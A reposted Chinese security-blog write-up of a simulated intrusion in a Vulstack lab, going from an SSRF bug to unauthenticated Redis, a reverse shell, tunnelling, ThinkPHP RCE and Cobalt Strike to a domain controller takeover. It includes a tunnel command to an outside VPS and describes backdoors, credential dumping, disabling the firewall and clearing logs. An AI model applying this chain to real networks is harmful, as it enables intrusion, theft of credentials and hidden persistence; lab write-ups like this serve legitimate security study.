SSRF–>Redis–>DC 全过程模拟记录

  • A+
所属分类:安全文章

更多全球网络安全资讯尽在邑安全

因为最近遇到一次实战,环境较为敏感,就不通过用真实环境来记录了。

我通过模拟环境来记录最终拿下域控的全过程,网络环境如下:

  1. 通过Vulstack的靶场模拟内网环境

  2. DMZ网段,一台LinuxRedis和公网WEB服务机器,不在域内

  3. 存在内网WEB服务,并且内网WEB服务在域内

0x01 外网突破:

  1. 在进行打点测试时,发现Web应用存在SSRF漏洞(通过Demo模拟),探测后发现协议没有限制,先探测一下本机的端口:

    SSRF-->Redis-->DC 全过程模拟记录

  2. 发现6379端口开启,猜测为Redis,通过dict操作发现,存在未授权访问漏洞,版本为5.0.9

    SSRF-->Redis-->DC 全过程模拟记录

  3. 可以通过Gopher协议写计划任务实现反弹shell,反弹shell到公网,通过一个小工具,生成Gopher数据:

    SSRF-->Redis-->DC 全过程模拟记录

    • 收到Shell,是一个哑Shell,目标机器存在Python环境,我们通过Python弹一个完整Shell


# 执行命令:

python -c 'import pty; pty.spawn("/bin/bash")'
  • 得到Shell:

SSRF-->Redis-->DC 全过程模拟记录

0x02 内网隧道建立:

  1. 先看一下网络结构,192.168.135.0,通过Venom将目标内网流量代理出去:

SSRF-->Redis-->DC 全过程模拟记录
  • agent下载到目标机,将流量转发出去:

# 目标机执行:

./agent_linux_x64 -rhost vps-ip -rport 9999

SSRF-->Redis-->DC 全过程模拟记录

  • 进入节点,启动代理:

SSRF-->Redis-->DC 全过程模拟记录
  • 本机配置好全局代理,探测网段192.168.135.0/24,端口扫描结果如下,重点关注192.168.135.150

SSRF-->Redis-->DC 全过程模拟记录
  • 访问一下,ThinkPHP框架,存在RCE

SSRF-->Redis-->DC 全过程模拟记录
SSRF-->Redis-->DC 全过程模拟记录

0x03 横向渗透

  1. 通过RCE,发现是台Windows主机,出外网,先排查下目标机器有没有AV或者杀毒,排查后没有杀毒

SSRF-->Redis-->DC 全过程模拟记录
  1. 直接CS生成Payload,远程下载执行,上线成功:

![image-20200716205859157](https://loecho.oss-cn-beijing.aliyuncs.com/Blog-Img/20200716205859.png)
  1. 等主机上线后我们就可以把代理关闭了,以后在启动代理通过CS启动就可以,给Linux主机种一个SSH后门,隐藏一个文件,作为启动文件,开始进行横向渗透:

- 通过`MS14-058`提权,获得管理员权限:



![image-20200716210430982](https://loecho.oss-cn-beijing.aliyuncs.com/Blog-Img/20200716210431.png)
  • 抓密码和hash,维持好权限:

SSRF-->Redis-->DC 全过程模拟记录
  • 收集一下网段信息,以及域内机器,真实环境中,还有各类域内服务,

    SSRF-->Redis-->DC 全过程模拟记录

  • Ping一下,得到域控IP: 192.168.138.138Arp-a查看所有ARP缓存表中的所有信息:

SSRF-->Redis-->DC 全过程模拟记录
SSRF-->Redis-->DC 全过程模拟记录
  • 结构很明确了,下一步直接拿域控,因为密码已经抓到了明文直接伪造Token,来上线域控

    SSRF-->Redis-->DC 全过程模拟记录

SSRF-->Redis-->DC 全过程模拟记录
  • 在Web服务器上起一个中转监听,以后域内机器都通过Web来进行中转,查看域内机器,远程上线域控:

SSRF-->Redis-->DC 全过程模拟记录
  • 直接上线,因为Web服务器的防火墙时开启的,我们暴力一点直接远程关闭防火墙,然后上线域控:

SSRF-->Redis-->DC 全过程模拟记录
  • 最终结果:

SSRF-->Redis-->DC 全过程模拟记录

后续清理各类日志,维持权限

权限持好后,就可以进行信息收集以及密码查找!

0x04 总结

  1. 相对基础的的一次渗透过程,真实环境中,也是外网进去,拿到了域内Web服务器,真实环境就不放了..主要工具免杀以及权限维持都会花费大量时间

  2. SSRF-->Redis-->DC 全过程的起点都是小小的一个SSRF,可见危害是及其严重的

转自先知社区

欢迎收藏并分享朋友圈,让五邑人网络更安全

SSRF-->Redis-->DC 全过程模拟记录

欢迎扫描关注我们,及时了解最新安全动态、学习最潮流的安全姿势!


推荐文章

1

新永恒之蓝?微软SMBv3高危漏洞(CVE-2020-0796)分析复现

2

重大漏洞预警:ubuntu最新版本存在本地提权漏洞(已有EXP) 




发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: